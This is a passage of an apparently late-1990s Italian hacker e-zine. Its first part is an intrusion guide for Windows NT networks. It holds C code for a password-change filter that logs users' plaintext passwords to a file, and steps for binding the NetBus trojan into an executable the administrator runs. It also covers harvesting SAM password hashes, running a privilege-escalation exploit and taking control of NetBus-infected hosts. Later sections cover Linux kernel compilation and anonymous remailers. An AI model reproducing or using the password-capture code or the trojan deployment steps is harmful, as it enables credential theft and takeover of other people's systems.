FILE_SHARE_READ|FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUGH, 0); WriteFile(fh, "Procedura InitializeChangeNotify avviata\n", 31, &wrote, 0); return TRUE; } LONG __stdcall PasswordChangeNotify (struct UNI_STRING *user, ULONG rid, struct UNI_STRING *passwd) { DWORD wrote; WCHAR wbuf[200]; char buf[512]; char buf1[200]; DWORD len; memcpy(wbuf, user->buff, user->len); len = user->len/sizeof(WCHAR); wbuf[len] = 0; wcstombs(buf1, wbuf, 199); sprintf(buf, "User = %s : ", buf1); WriteFile(fh, buf, strlen(buf), &wrote, 0); memcpy(wbuf, passwd->buff, passwd->len); len = passwd->len/sizeof(WCHAR); wbuf[len] = 0; wcstombs(buf1, wbuf, 199); sprintf(buf, "Password = %s : ", buf1); WriteFile(fh, buf, strlen(buf), &wrote, 0); sprintf(buf, "RID = %x\n", rid); WriteFile(fh, buf, strlen(buf), &wrote, 0); return 0L; } 2. Usare i trojan In questi ultimi tempi stanno uscendo in Internet vari trojan tipo NetBus e Back Orifice. Questi programmi sono considerati "da lamer" da molti hacker ma io penso che, se usati con intelligenza, possano essere molto utili anche agli hacker! Pensate infatti di trovarvi seduti davanti ad una Workstation WinNT ed avere solo accesso guest; magari non avete neanche accesso fisico al server. Come fare per ottenere l'accesso root su TUTTA la LAN?? Basta usare la fantasia! Andate su "Risorse di Rete" ed accedete al server.Quasi sicuramente esso avr delle cartelle condivise. Aprite queste cartelle e cercate qualche applicazione che sapete essere usata spesso dal sysadmin. Usando Silk Rope (il programmino degli hacker CDC) fondete il .exe di quell' applicazione con il server di NetBus (patch.exe). Il gioco fatto! Quando il sysadmin user il suo programmino NetBus si installer sul WinNT Server e voi sarete padroni di quel computer come se foste seduti davanti. Una volta dentro baster usare il metodo N1 per ottenere le pass oppure prelevare i file .SAM come spiegher nel punto 3. 3. I file SAM (Da "Enciclopedia dell'Hacking" by Lord Shinva) Dove si trovano le password in Windows NT? Da nessuna parte. Windows NT (come anche UNIX) non immagazzina le password, ma bensi` un hash (valore numerico calcolato in base alla password, dal quale non si puo` risalire alla stringa originale, in quanto e` solo un numero). Per crackare gli hash si puo` utilizzare il programma PWDUMP (lo potete trovare sui siti hacker) e comunque si tratta di un attacco basato su dizionari, quindi di tipo "brute force" (forza bruta). Quindi, dicevamo, la domanda giusta sarebbe: "dov'e` l'elenco degli hash?" La risposta e`: nella directory \WINNT\SYSTEM32\CONFIG c'e` un file chiamato SAM. E` questo il database che cerchiamo. E` leggibile da tutti gli utenti (a meno che quel simpaticone del SysAdmin non ci abbia messo lo zampino), ma comunque non si puo` leggere in quanto bloccato (via sharing) perche` e` in uso dai componenti di sistema di NT. A questo punto il SysAdmin giubila ed esulta, ma l'hacker sa dell'esistenza di SAM.SAV che il backup di SAM... Inoltre, durante l'installazione di NT, una copia del SAM viene posta in \WINNT\REPAIR. Quasi sicuramente troveremo solo gli account Administrator e Guest, ma credo che Administrator (SysAdmin) sia abbastanza... A proposito del SAM... se siete completamente pazzi potete anche mettere le vostre manacce nelle keys del SAM. Per esempio, schedulando il servizio di logon come LocalSystem e permettendogli di interagire con il desktop, e poi schedulando una sessione interattiva di regedt32.exe (come LocalSystem) con il quale manipolare le keys. Ovviamente se non sapete a cosa serve tutto questo sar meglio non toccare niente, altrimenti saranno guai grossi... 4. Diventare root su una sola macchina Nonostante l'obbiettivo di un hacker sia spesso diventare sysadmin su tutta la rete LAN e quindi sul server, non si deve disprezzare l'ipotesi di diventare root su una delle workstation. Per farlo ci viene incontro un bel programmino che sfrutta un grosso bug del sistema operativo. Noi NewBies abbiamo messo per voi sul nostro sito con il nome secole2.zip (cmq e' anche in questo zip ndN0bodY88). Per farlo funzionare basta estrarre i 2 file dello zip in una qualsiasi directory dell'hd ed eseguire il file .exe. Quando questo avr terminato il suo lavoro vi baster riavviare il computer e vedrete che siete stati aggiunti alla lista dei sysadmin!! Esaminiamo ora i vantaggi di diventare root su una workstation: - abbiamo pieno accesso a tutti i file dell'HD e possiamo modificarli a nostro piacimento - possiamo modificare tutte le chiavi del registro e magari, lavorando con le associazioni dei file ai vari programmi possiamo far eseguire al sysadmin delle operazioni che non vuole ;-) - abbiamo la possibilit di installare tutti i programmi che vogliamo senza che ci appaia la scritta "per installare il programma sono necessari i privilegi dell'amministratore di sisitema"! Quindi possiamo sbizzarrirci ad installare programmi utili a raggiungere il nostro scopo ultimo (root sul server) e magari anche per installare qualche bel videogioco!!! Se poi avete accesso fisico al server e riuscite a farvi girare questo bel programmino, sarete i padroni di tutta la rete!!! 5. Conclusioni Per concludere vi dar qualche consiglio. Prima di incominciare ad hackerare una rete di computer senza quasi sapere cosa state facendo, raccogliete pi informazioni possibili su di essa, sui sysadmin e sui programmi da loro usati. Cercate di scoprire quali sono le persone che hanno accesso al server per poter poi tentare di far eseguire loro dei comandi. Quando hackerate cercate di usare la fantasia, non basta conoscere due o tre exploit per riuscire nell'intento! Cercate di essere sempre discreti e fate finta di non sapere nemmeno come si accenda un PC. Per gli exploit su WinNT li potete trovare cercando su www.rootshell.com e su neworder.box.sk. Ciaoz AX1S ͻ Ŀ CHI HA PAURA DI NET-BUS E BACK ORIFICE? ٺ ͼ Bhe io no sicuramente odio questi pacchetti preconfezionati , ma dopo una discussione con Bismark [ il creatore del bisnuke ] un par de sere fa' penso che e' ovvio sia divertente x chi si avvicina per la prima volta a qualcosa che somigli vagamente all' hacking... Anche io lo confesso per un par de giorni mi sono divertito un mondo con quel prog ma in modo diverso : ho analizzatto i comandi che NET-BUS da' durante la connessione , e soppratutto quello che riguarda la passwd . Esistono gia' pacchetti preconfezionati per togliere la passwd agli hosts protetti [ ovvero quando vi collegate e vi richiede la password ] ma vedremo come possiamo fare da soli allora apriamo il caro TELNET e mettiamo l' ip della vittima e come porta settiamo 12345 che e' ovviamente quella che net-bus usa per la connessione ok siamo collegati ed ora scriviamo: ok in questo modo abbiamo settato la password che volevamo , ricolegghiamoci con NET-BUS inseriamo quella passwd ed il gioco e' fatto . Ora inseriro' parti di un articolo preso dalla rivista inter.net che mi ha molto colpito: Il problema come giustamente puntualizza non sono gli hacker che fanno del l'intrusione una sfida all' anonimato ; la piaga peggiore e' la pletora di pirati dell' ultima ora che pensa di diventare hacker usando pacchetti preconfezionati . A questo reagente aggiungiamo il catalizzatore della leggerezza di una grande quantita' di utenti che per fretta ,insufficente conoscenza dei pericoli non controlla cio' che riceve e si ritrova di tutto sul proprio computer. Il danno e' dovuto in questo caso alla mancanza di profilassi , Se e' vero che un cannone fa' piu' male di una zanzara , questa pero' passa inosservata ed e' in grado di sterminare piu' di una guerra . Ok perfetto quindi un bel messaggio da parte mia per chi si ostina ad usare SOLO ED ESCLUSIVAMENTE BO O NET-BUS E COMBINA DEI DANNI ALL' INTERNO DEI PC INFETTI: SIETE DEI LAMERONI. ZeroCool ͻ ͹LINUX [ UNA MIA DOMANDA ]͹ ͼ Allora raga ho comprato la nuovissima Matrox Mistique G200 e non riesco a trovare i cazz di driver di supporto per linux [ scusate se li chiamo driver di supporto ma non so proprio come cazz chaimarli ] se qualcuno sa se li hanno fatti e dove si possono scaricare ringrazio in anticipo ... ZeroCool ͻ ͹LINUX [ NEWS ]͹ ͼ LINUX [ news ] Allora in questo articolo voglio darvi delle belle novita' per qunto riguarda i prog che reputo belli x linux. Ok iniziamo: MESA 3.1 BETA : le open-gl di linux una libreria grafica che usa le API di OpenGl , usatelo x quake 2 [ la ver. linux ovviamente ] Gtk See 0.1.4 Image browser Modello ACD-SEE supporta anche i formati XCF , PSD , XBM TiMidity 0.2j midi a wave [ programma di conversione ] X11AMP Che bello una specie di WinAmp x linux ed e' stabilissimo Che ne pensate? Io li ho installati e li ritengo spettacolari. Ovviamente non centrano molto con l'hacking ma mi sembra divertente scriverlo [ se fa schifo ditelo ] ZeroCool ͻ Ŀ IL KERNEL, QUESTO SCONOSCIUTO! ٺ ͼ Uno degli argomenti che forse terrorizzano di pi i novellini di Linux capire cosa sia il kernel e come fare a compilarsene uno, processo di per s abbastanza semplice una volta venuti in possesso di alcune conoscenze di base... L'intento di questo articolo quello di sfatare miti e/o leggende dall'argomento in questione, fornendovi le dritte giuste (ma spiegandovene anche il significato, per lo meno ad "alto livello") per portare a compimento l'operazione in oggetto senza paturnie addizionali... Il mio intento principale quello di favorire la chiarezza a discapito della complessit, qualit in ogni caso non particolarmente necessaria in questa sede. FACCIAMO LA SUA CONOSCENZA... Prima di incominciare mi sembra doveroso spiegare cosa sia questo famigerato kernel e quali sono le sue funzioni principali... Lo potremmo immaginare come una sorta di "programma a basso livello", che si prende cura dei processi (ovvero dei programmi in esecuzione) e che funge da interfaccia tra il livello delle applicazioni e l'hardware sottostante (come vi ho detto ho rinunciato alla completezza delle definizioni per aumentare la comprensibilit del tutto); i suoi compiti principali, oltre a filtrare le richieste dei processi verso l'hardware, sono quelle di mantenere traccia degli stessi, di riservare a ciascuno uno spazio nella memoria e di gestire quello che in termini informatici viene definito come "scheduling", una funzione atta a garantire che tutti i programmi in esecuzione possano fruire della CPU per le elaborazioni; sui moderni sistemi operativi siamo abituati a vedere pi processi in esecuzione contemporanea (multitasking), ma, in realt, un solo processo attivo nella CPU rispetto all'unit di tempo... Ed proprio questo il punto: in un dato momento il programma X in esecuzione, ma subito dopo X potrebbe essere sospeso dallo scheduling per dare un po' di tempo di esecuzione ad Y, per poi passare a Z o ritornare a X. In pratica a noi sembra che le computazioni dei vari programmi vengano portate avanti in parallelo, anche se, come vi ho detto, le cose stanno in modo diverso (spero di aver chiarito il concetto). Sarete sicuramente giunti, dopo la definizione sopra riportata, alla seguente conclusione: un sistema operativo non potrebbe funzionare senza il nucleo del kernel, ed per questo che cos importante. Il discorso fino ad ora affrontato era di carattere generale, vediamo ora di renderlo pi specifico... ͻ ͹IL KERNEL DI LINUX͹ ͼ Il kernel di Linux, sviluppato dall'ormai ultraosannato Linus Torlvalds e da altri volontari viene innanzitutto distribuito come sorgente in linguaggio c, e questo richiede sostanzialmente che voi dobbiate compilarlo per poterlo utilizzare (un listato in linguaggio c non pu infatti essere eseguito direttamente dal computer... deve venire prima trasformato in un formato fruibile direttamente - il formato eseguibile - attraverso una fase che viene detta "compilazione"). Esistono varie versioni del kernel, in quanto questo viene costantemente aggiornato per migliorarne le prestazioni e/o correggere bachi presenti nelle versioni precedenti; pi precisamente esistono in contemporanea due versioni differenti dei sorgenti del kernel, una assolutamente stabile per gli utenti "normali" e una pi "sperimentale" (ma comunque altamente stabile in linea di massima) per gli sviluppatori e gli smanettoni: attualmente le versioni stabili sono quelle contraddistinte con il numero di versione 2.0.X, mentre quelle per gli sviluppatori hanno il numero di versione 2.1.X. A meno che non possediate hardware non supportato dalle versioni stabili del kernel, sconsiglio agli utenti di utilizzare quelle sperimentali (che, una volta terminata la fase di testing, ci porteranno alle nuove versioni stabili 2.2.X). Come discorso generale, per capire se una versione del kernel stabile o meno si osserva il secondo numero di versione (quello in mezzo): numeri pari = stabile, numeri dispari = sperimentale (infatti 2.0.X stabile, 2.1.X sperimentale). La versione stabile pi recente , nel momento in cui sto scrivendo questo articolo, la 2.0.35 (comunque la 2.0.36 gi dietro l'angolo e potrebbe essere stata gi rilasciata mentre leggete questo articolo). Segue ora un metodo esaustivo per conoscere quali siano le release pi recenti del kernel, da digitare al prompt dei comandi una volta collegati alla rete (da Linux, a meno che non disponiate del programma finger anche in Windows); quello che dovrete digitare semplicemente: finger @ftp.kernel.org Questo quanto appare a me in questo momento: infectmachine:~> finger @ftp.kernel.org [linux.kernel.org] The latest stable version of the Linux kernel is: 2.0.35 The latest *beta* version of the Linux kernel is: 2.1.126 infectmachine:~> (infectmachine il nome della mia macchina). come potete vedere, la versione stabile pi recente la 2.0.35 . Ora che sappiamo cosa scaricare utilizziamo ftp su ftp.kernel.org per scaricare i sorgenti di quello che ci interessa: il nome del file che dovete prendere in questo caso "linux-2.0.35.tar.gz"; la dimensione dello stesso non dovrebbe superare gli otto mega, con un'oretta di fatica dovreste riuscire a farlo vostro. Una volta terminato il download siamo pronti ad effettuare la compilazione. COSA VI SERVE Oltre al file appena scaricato vi servir il compilatore gcc (dovreste averlo gi installato, in caso contrario fatelo!) e una conoscenza per lo meno approssimativa del vostro hardware: mi sto in particolar modo riferendo al tipo di hard disk che si utilizza (IDE o SCSI), stesso discorso per il CD-ROM (oggigiorno dovrebbero essere tutti IDE o SCSI, tuttavia alcuni rimasugli del passato utilizzavano un controller proprietario), ma anche i dati inerenti alla scheda sonora, come ad esempio i numeri di DMA o IRQ. Queste informazioni le possiamo ottenere "a scrocco" dal caro e amato Windows 9X semplicemente premendo il pulsante destro su "risorse del computer". Viene molto in aiuto, in questo caso, il solito foglietto di carta. Bene, abbiamo tutto quello che ci serve per iniziare: entriamo come root nella nostra macchina e spostiamoci innanzitutto nella directory /usr/src (comando "cd /usr/src"); dovremmo a questo punto trovare per lo meno due directory (utilizzate il comando "ls" per mostrare il contenuto della directory in questione): una si chiama linux-2.0.X (la versione del kernel, sempre che l'abbiate installata, contenuta nella distribuzione da voi utilizzata e quasi sicuramente non la pi recente disponibile), mentre l'altra un link a detta directory (ovvero scrivendo "cd linux-2.0.X" o "cd linux" si entra in pratica nella stessa directory). Visto che noi siamo in possesso di una versione pi recente facciamo innanzitutto in modo di sostituire i sorgenti obsoleti con quelli nuovi. L'operazione in questione eseguita dai seguenti comandi (da eseguire ovviamente in /usr/src): 1) mkdir linux-2.0.35 (crea la directory che andr a contenere la versione del kernel 2.0.35 (il file linux-2.0.35.tar.gz che abbiamo appena scaricato) 2) rm linux 3) ln -s linux-2.0.35 linux (crea un nuovo link simbolico di nome linux che punta alla directory 2.0.35) 4) tar xzvf /percorso/linux-2.0.35.tar.gz (al posto di percorso va sostituito il percorso in cui avete scaricato i sorgenti; questa operazione estrae dal l'archivio compresso i sorgenti del kernel e li mette nella directory linux-2.0.35 creata in precedenza). 5) rm -rf linux-2.0.X (cancella la vecchia directory dei sorgenti 2.0.X; -rf aggiunto al comando rm (remove) serve a dire "ricorsivo e forzato", in quanto il comando in questione solitamente non cancella directory che non sono vuote). A questo punto entriamo nella directory linux con un bel "cd linux" e siamo pronti ad eseguire la fase di messa a punto del kernel, che ci permetter di scegliere quali componenti dello stesso includere in quello che stiamo per compilarci. A seconda del gusto personale sono disponibili tre differenti comandi per compiere questa operazione; la differenza sta esclusivamente nell'interfaccia che si vuole utilizzare: 1) make config (modalit ascii: verr visualizzato un elenco in cui selezionare i componenti con Y (yes), N (no) e M. Il significato di cosa sia un modulo verr affrontato tra poco. 2) make menuconfig (sempre modalit testo, ma ci troviamo in questo caso di fronte a dei comodi menu in cui effettuare la selezione con il tasto spazio). 3) make xconfig (da utilizzare se avete avviato X Window. Vi permetter di selezionare i componenti del kernel con pratici click del mouse). Aggiungere elementi che non servono al kernel non comporta nulla di particolare, se non aumentarne la dimensione e/o renderlo un po' pi "pesante". proprio per questo vi avevo suggerito di scrivervi su un foglietto i vari componenti hardware presenti. Poco sopra vi ho parlato di tre differenti "valori" da attribuire ai vari componenti: possibile includerne uno con yes (asterisco se avete usato menuconfig), escluderlo con no (e in questo caso non verr compilato nel vostro kernel), ma anche possibile renderlo un "modulo" con la lettera "M". Cosa significa renderlo un modulo? presto detto: sempre per alleggerire il kernel e non includere al suo interno componenti che non si utilizzano spesso, possibile rendere questi ultimi modulari; in questo caso sar possibile caricarli e scaricarli dalla memoria a seconda della necessit (se utilizzate i moduli vi consiglio vivamente di dire yes al supporto di kerneld che troverete tra le varie opzioni: esso fa in modo che queste operazioni siano automatiche e trasparenti all'utente; in caso contrario dovrete farle a mano!). Segue ora una breve spiegazione di tutte le voci selezionabili una volta digitato "make xconfig". I concetti espressi sono ovviamente riportabili anche al caso in cui voi abbiate digitato "make menuconfig" o "make config". (in questo ultimo caso le scelte di default vi verranno suggerite ad ogni domanda) Code maturity level options: dire di lasciare questa voce cos com', ovvero con la sola voce presente non selezionata Loadable module support: aggiungete al supporto del moduli nel kernel (voce Enable loadable module support) anche kernel deamon support: serve, come dicevo prima, a far caricare al kernel i moduli in automatico. General setup: in questo menu si seleziona il tipo di processore, si abilita l'emulazione del coprocessore matematico virtuale (per chi non ce lo avesse perch ad esempio in possesso di un processore 486SX) e si limita la memoria a meno di 16 mega (l'opzione serve per alcune scheda madri bacate del passato che non riuscivano bene a gestire la memoria). Si noti come comunque il tasto "help" possa fornirci dati supplementari. Per un processore Pentium o superiore direi di lasciare le cose cos come stanno (a meno di non possedere un PPro: in questo caso possibile specificare questo tipo di CPU). Floppy, IDE and other block devices: questa sezione abbastanza lunga, ma per fortuna c' ben poco da cambiare... Innanzitutto, a meno di non essere in possesso di una scheda madre che monta il chipset CMD640 o RZ1000, direi che il caso di eliminare queste due voci (il 90% delle schede madri montano in genere un chipset Intel, per lo meno per ora). Per il resto lasciate tutto cos com'. Networking options: una buona scelta lasciare le impostazioni cos come stanno! SCSI support: stessa cosa per questo menu... Se non disponete di un controller SCSI o non intendete accedere a un eventuale masterizzatore EIDE attivando l'emulazione SCSI-ATAPI, lasciate tutto disabilitato (scelta di default). Network device support: nel caso di una macchina che si collega ad Internet mediante un modem selezionate come modulo la voce "ppp"; opzionalmente selezionate anche, sempre come modulo, la voce "plip": vi torner utile per creare connessioni TCP/IP tra due computer con un cavo null-modem parallelo. Prima o poi vi spiegheremo come si fa. Infine, a meno che non possediate una scheda di rete ethernet, vi consiglio di deselezionare la voce "ethernet". Lasciate tutto il resto cos come lo avete trovato. ISDN subsystem: se non disponete di una connessione ISDN lasciate tutto cos come sta, ovvero con niente selezionato. CD-ROM drivers: questa voce serve ad includere nel kernel il supporto per CD-ROM non ATAPI (quelli insomma che fanno uso di controller proprietario). Se possedete un CD-ROM ATAPI (dire il 99% dei casi) lasciate tutto deselezionato. Filesystems: seleziona i tipi di filesystem che il kernel supporter una volta compilato... Vi suggerisco di mettere come modulo il filesystem "minix" e l'"extended" (non si sa mai, potrebbero anche servirvi!), di lasciare selezionato il "second extended" (se lo deselezionate non riuscirete pi a fare il boot della macchina: quello che utilizza Linux per le sue partizioni!!), e di selezionare con "yes" le voci "native language support", "ISO9660" (il filesystem dei CD-ROM!), "DOS FAT", "MSDOS", "FVAT" (i nomi lunghi nelle partizioni di Windows 95), "codepage 423", "NLS ISO 8859-1" "proc". Se pensate di aver bisogno di NFS (network filesystem, serve per importare ed esportare il proprio filesystem in rete) selezionatelo pure come modulo. Lasciate il resto con le impostazioni di default. Character devices: lasciate pure le cose come stanno, a meno che non possesiate una stampate; in quest'ultimo caso vi consiglio di selezionare il "parallel printer support" come modulo (non si stampa infatti tutto il giorno e cos facendo lasciamo il kernel pi leggero, non includendolo direttamente al suo interno!). NB: se siete in possesso di un mouse diverso da quello seriale (ad esempio PS/2) sar necessario selezionare anche la voce "mouse support" e scegliere il proprio mouse dall'elenco sottostante. Sound card support: se disponete di una scheda sonora abilitate il supporto al sonoro (io lo includo sempre nel kernel con "yes", ma potreste anche selezionare il tutto come modulo). Viene ora in aiuto il foglietto di prima, quello con memorizzati i dati della scheda sonora... Sar infatti necessario specificarne i vari indirizzi base, nonch IRQ e DMA. In genere le voci da selezionare (per lo meno per le Sound Blaster e relativi cloni) sono: "sound blaster", "generic OPL2/OPL3 FM syntesizer", "/dev/dsp e /dev/audio", "MIDI interface" e "FM syntesizer". I parametri degli indirizzi delle schede variano a seconda del modello: per esempio io inserisco come indirizzo base "220", come IRQ "5", come DMA e DMA16 "3" e "7", come indirizzo di base MPU401 "330". Non inserite i dati riportati qui, la vostra scheda sonora potrebbe non funzionare affatto! Molto meglio il foglietto di cui sopra. Kernel hacking: questo menu contiene solo due voci... lasciatele deselezioate. La procedura di configurazione conclusa... Salvate la configurazione corrente con l'apposita opzione (con "make xconfig" trovate un apposito bottone) e uscite dal programma. Siamo giunti alla fase di compilazione vera e propria... Quest'ultima potrebbe richiedere solo 5 o 6 minuti se eseguita su macchine veloci, ma nel caso di un 486 potrebbe essere necessaria anche mezz'ora o pi. Molto meglio quindi andarsi a bere un bel caff, dopo aver ovviamente digitato il seguente comando (in effetti sono pi comandi divisi da punto e virgola, ma molto meglio scriverli cos perch poi ci si pu dedicare ad altro... In caso contrario dovreste aspettare la terminazione del comando precedente ed inserirli uno per volta): make dep; make clean; make zImage; make modules; make modules_install I primi due comandi (make dep; make clean) servono a ripulire i sorgenti di compilazioni precedenti; se avete appena installato dei nuovi sorgenti potete anche saltare questi passaggi, ma in ogni caso buona abitudine eseguirli (non si sa mai); il terzo comando (make zImage) compila il nucleo del kernel, mentre gli ultimi due compilano ed installano i moduli al posto giusto. Siete davvero arrivati alla fine... Un po' di pazienza e potrete avviare il vostro sistema Linux con il kernel compilato da voi e fatto su misura per la vostra macchina! Le operazioni da seguire sono le seguenti (si riferiscono sostanzialmente alla Slackware, ma con qualche piccola modifica si adattano anche alle altre distribuzioni). 1) cd /; mv vmlinuz vmlinuz.old (Dal momento che abbiamo imparato a digitare due comandi in una sola riga separandoli da un ";" sarebbe brutto non farlo anche adesso, non vi pare? Il primo comando vi porta nella directory principale, altres nota con il nome di "root"; il secondo rinomina il vecchio kernel, che si chiamava vmlinuz, in vmlinuz.old... Non si sa mai, potrebbe sempre servire, almeno fino a quando non siete sicuri che il vostro nuovo kernel funzioni. In questo caso cancellatelo con un bel "rm vmlinuz.old"). 2) cp /usr/src/linux/arch/i386/boot/zImage /vmlinuz (copia il nuovo kernel, contenuto in /usr/src/linux/arch/i386/boot/ - ricrodate make zImage? - nella root directory e lo chiama vmlinux, proprio come quello vecchio). 3) OPZIONALE (non lo devono fare gli utenti della distribuzione Slackware): potrebbe rendersi necessario spostare il kernel in una directory diversa da "/" ed editare il file lilo.conf contenuto nella directory /etc. Se avete problemi vi invito a mettervi in contatto con me. 4) lilo (serve ad aggiornare il LInux LOader per fargli caricare il nuovo kernel). 5) shutdown -r now (fa il reboot della macchina. Incrociate le dita ed attendete fiduciosi il primo avvio del vostro nuovo kernel!) TUTTO E' BENE QUEL CHE FINISCE BENE... Se non state piangendo lacrime amare (99% dei casi) significa che il sistema si riavviato con successo... Complimenti, avete appena compilato il vostro primo kernel!!! Rientrate come root e postatevi nella directory /lib/modules e digitate "ls" (l'equivalente del comando dir di MS-DOS). dovreste trovare per lo meno due directory, ovvero 2.0.Xe 2.0.35. Visto che non vogliamo sprecare spazio per nulla ora il caso di cancellare i vecchi moduli con un bel rm -rf 2.0.X (nel nostro caso rm -rf 2.0.34). Si noti che in fase di avvio potreste scorgere alcuni messaggi di errore che reclamano la presenza dei moduli "char-major-10", "net-pf-4" e "net-pf-5". Potete tranquillamente ignorarli, ma se urtano la vostra sensibilit editate il file /etc/conf.modules ed aggiungete le seguenti linee: alias char-major-10 off alias net-pf-4 off alias net-pf-5 off Al prossimo reboot non vi infastidiranno pi... Testi presi da un po' tutte le parti e riadattati by ZeroCool ͻ Ŀ La posta anonima. ٺ ͼ Ciao a tutti! Volevo salutare tutti i componeti del gruppo e presentarmi in modo da parlare un pokino di come mi sono trovato a casa , con il pc acceso e le ragazza che mi chiamava dal letto mentre avevo in mente solo come iniziare questo articolo, chiesto dal caro amico N0body88.Beh, che volete , la parola l'avevo data , la crittografia della posta mi sempre affascinato ed ormai da parecchio che la sperimento sulla mia pelle , quindi ho deciso di condividere queste poche cose che so con tutti.Intanto la mia ragazza ha perso ogni interesse e si messa a giocare a Croc ;-[ Vebb, a parte tutto , volevo solo dirvi che io faccio parte del Club SPiPPoLaTorI in veste di Webmaster e che sono stato contattato da N0body88 per scrivere qualcosa di non molto definito sulla vostra zine.Be, eccovi accontentati! Si inizia! Dando per scontato che voi sappiate cosa e come funziona pgp , cosa sono gli header delle mail e come leggerli , mi propongo di spiegarvi con parole facili cos' e come funziona la posta anonima , partendo dagli anonymous mail server fini ai nym server concatenati passando per PGP e tutti remailer noti. iniziamo proprio dai remailer di uso pi facile , i cosiddetti anonymous remailer. Ne esistono di 3 categorie : tipo 0 , tipo 1 e tipo 2. I remailer di tipo 0 come il defunto penet.fi erano in grado di fornire un'account di mail anonimo e permettevano un reinstradamento delle mail sia in arrivo sia in uscita eliminando gli header alle mail in uscita.Per reindirizzare una mail mandata verso l'indirizzo anonimo vi era sul server un database con la corrispondenza mail anonima-mail reale e ci ha causato la chiusura di penet.fi ,sia perch gli addetti al server potevano avere l'accesso alla lista , sia a causa di un processo nel quale il sysadmin dovette rivelare la vera mail di uno pseudomino del suo server. Invece i remailer di tipo 1 sono definiti di tipo cypherpunk e hanno diverse caratteristiche interessanti: -non tengono in maniera assoluta i log E mi sembra il minimo , se si vuole che la posta sia anonima - possibile usare la chiave pgp del remailer per instradare i propri messaggi E qui gi il discorso si fa complicato!Insomma , se voltete spedire una mail con pgp e volete essere sicuri che nessuno la legga nel tragitta fra il vostro pc ed il server remail, usate la chiave del remailer per cifrarla. Al resto penser lui! -accettano posta crittata con pgp Se poi volete postare un messaggio crittato con pgp ad un vostro corrispondente potete farlo ,usando la sua chiave pubblica -permettono la concatenazione dei remailer Logicamente , pi passaggi fanno le mail , pi si perdono le vostre tracce -possibilit di riordino dei messaggi Il server da un tempo di latenza a caso per ogni mail. -possibilit di spedire la mail ad orari prestabiliti Manda le mail sopo un'intervallo di tempo specificato. -inserire header in pi Utile se si vuole postare su un ng o mettere ben in evidenza il subject , dato che spesso i remailer levano il subject Per avere un'idea del funzionamento di un remail di questo tipo mandate una mail a remail@replay.com , con nel subject la parola help , o chiedetemi la traduzione dell'help in italiano. Gi a questo punto potete facilmente capire che se si imposta una catena di remailer per mandare un messaggo si pu gi pensare ad un discreto grado di sicurezza.Ricordate che il numero minimo di remailer consigliato 3 e che la sicurezza totale la si ottiene solo usando la crittazione dei messaggi con pgp. In pratica la catena dei remailer cos: se si vuole spedire un messaggio da A verso B , usando N remailer il percorso schematico sar questo: A->N1->N2->N3->B Se poi usate remailer di tipo 0 e vi avvalete della possibilit di crittazione dei messaggi e del posting dei messaggi cifrati siete gi abbastanza sicuri! Dovete contare che chi riceve i messaggi anomini sa solo l'indirizzo dell'ultimo remailer della catena e per mettersi in contatto con voi non ha nessun appiglio. Anche se si risalisse al log(che non esiste) dell'ultimo remailer nessuno potrebbe sapere dove viene inviata la mail dato che inserito in una chiave pgp.Capite che cosettina interessante? Comunque , se vero che un buon anonimato si ottiene usando pi remailer vi consiglio di non esagerare dato che spesso i remailer sono down quindi non allungate troppo la catena altrimenti rischierete lo spezzamento, con la conseguente perdita della mail. Adesso passiamo alla descrizione dei remailer di tipo 2 , detti mixmaster. Sono pi sicuri dei remailer di tipo 1 in quanto , prevedendo anche l'invio di messaggi crittato con pgp , incorporano anche suddivisione dei pacchetti, crittazione con differenti algoritmi, invio attraverso diversi remailer che crittano in cascata , riordino casuale dei messaggi e successiva "ricomposizione" solo al destinatario.Inoltre dispongono di metodi avanzati per mandare mail "fasulle" in modo da confondere uno spoofing in uscita ed assegnano ad ogni pacchetto un numero univoco in modo da non permetterne il reinstradamento. Consentono inoltre di ricevere messaggi generati dai cypherpunk remailer e quindi di fare parte di una catena di remail di tipo 1.Fin qui i vantaggi, ma gli svantaggi di questi remailer? Beh , il pi evidente per chi non usa UNIX il fatto che non esiste un programma che generi dei messaggi compatibili con il formato mixmaster, esiste solo un sorgente da poter compilare sotto DOS , ma non alla portata di tutti.L'unico modo di ovviare a ci ricorrere a Private Idaho ed al l'apposito plugin per dos.Mmm, Private Idaho l'ho citato ma forse non sapete che cos'.. Beh, un'applicazione che in grado di gestire catene di remailer di tipo 1 e , con l'apposito plugin , anche di tipo 2 , ma si rivela utilissimo usando i nym server , dei quali tratter poco pi avanti. I nym server sono dei particolari server che consentono lo scambio bidirezionale dei messaggi di posta senza che nessuna delle due persone che intendono comunicare riveli ad altri il proprio indirizzo mail.Infatti usando un remailer di tipo 1 o di tipo 2 il mittente conosce il destinatario ma non viceversa.Anche se a questo problema si pu ovviare usando un cosiddetto "reply-block" che altro non che una serie di istruzioni di inoltro attravero vari remailer crittata con pgp.Il vantaggio immediato di un reply block che il destinatario della nostra missiva anonima possa contattarci , senza conoscere il nosrto vero indirizzo mail.Un'altro vantaggio non da sottovalutare che si possono (e sarebbe meglio farlo) usare pi catene di remailer , una per l'inoltro ed una per il reply block , aumentando cos di N volte la sicurezza , dove N il numero dei remailer convolti nella procedura.Tenete anche presente che un reply block non viene interpretato da molti software di gestione di mailinglist, qualimajordomo o listserv. Per un metodo veramente supersicuro vanno usati i nym server, nome derivato dall'abbreviazione di pseudonymus server.Essi permettono di avere mail veramente anonime e di avere la possibilit di avere delle risposte alle vostre mail senza che il destinatario si trovi ad usare pgp e la catena dei remailer specificati nel reply block.Bisogna anzitutto capire in base a che principio funzionano questi server per poterli sfruttare al meglio. Essi sono qualcosa di molto simile ai remailer di tipo 0 , cio hanno un database di relazione indirizzoanonimo->indirizzo reale e viceversa ma sono molto pi sicuri dato che hanno la possibilit di specificare come indirizzo reale in un nym.Quindi , prima di usare un server di questo tipo , bisogna avere un nym da utilizzare.Per crearlo sufficiente creare una chiave pgp ad uso esclusivo della ricezione e dell'invio di mail per il server.A questa chiave vanno aggiunte in cascata le istruzioni per i remailer che si intendono usare nella catena di risposta.A questo punto si crea un'account sul server nym scelto e gli si invia il nostro reply block appena creato.Da questo momneot in poi possibile inviare la posta e sapere che non sar possibile risalire a voi in nessun modo. Infatti i passaggi che il messaggio far per transitare da A verso B sono i seguenti : A->server nym->remailer1->remailer2->remailer3->B Per aumentare l'anominato potete sempre usare questa procedura: A->remailer1->remailer2->remailer3->server nym->remailer3.1->remailer2.1->remailer1.1->B Nel momento che la posta arriva al server nym, viene letto il nostro nym ed eseguite le istruzioni di remail incluse. Tutti i passaggi saranno 